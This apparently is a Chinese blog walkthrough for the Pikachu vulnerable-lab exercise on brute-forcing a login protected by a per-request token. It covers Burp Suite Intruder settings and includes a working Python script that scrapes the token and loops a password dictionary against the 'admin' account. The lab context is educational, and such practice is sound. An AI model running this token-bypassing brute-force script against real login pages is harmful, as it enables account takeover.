pikachu 返回值 token防爆破-burpsuite

知识点:利用 burpsuite 循环把返回的 token 值加到登录的 token 上。

burpsuite 实现步骤

先抓包,然后发到 repeater 里发个包

在这里插入图片描述
之后再由 repeater 转发到 intruder ,选中要爆破和替换的值,并把 attack type 模式调成 pitchfork
在这里插入图片描述
然后选择 1 的位置,也就是密码,载入要爆破的字典。
在这里插入图片描述
参数二,也就是 token 有两个要设置的地方,第一个就是要从返回的数据中选中 token
在这里插入图片描述
选中 token 并点击 ok
在这里插入图片描述
第二个地方就是重定向的模式。

在这里插入图片描述
最重要的一步就是要把线程数设置为一。

在这里插入图片描述
最后就是设置 token 参数的爆破模式了。
在这里插入图片描述

最后攻击后可以明显看到一个返回值长度不一样的数据,密码是 123456
在这里插入图片描述

python 脚本实现步骤

import requests
from lxml import etree
url = 'http://64dff89e-c426-4cdc-8b0d-2064b2b5c2b4.node4.buuoj.cn:81/vul/burteforce/bf_token.php'

token_xpath = "//div[@class='bf_form_main']/form[@id='bf_client']/input/@value"

s = requests.session()

req = s.get(url)
req.encoding = 'utf-8'
html = etree.HTML(req.text)
token = html.xpath(token_xpath)
token = ''.join(token)

with open('../字典/passwd.txt','r') as f:
    password = f.readline()[:-1]
    while True:
        if(password == ''):
            break
        else:
            password = f.readline()[:-1]
        data = {
            'username':'admin',
            'password':password,
            'token':token,
            'submit':'login'
        }
        req_two = s.post(url,data=data)
        if 'login success' in req_two.text:
            print('[+]: ' + password)
            break
        else:
            req_two.encoding = 'utf-8'
            html = etree.HTML(req_two.text)
            token = html.xpath(token_xpath)
            token = ''.join(token)
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值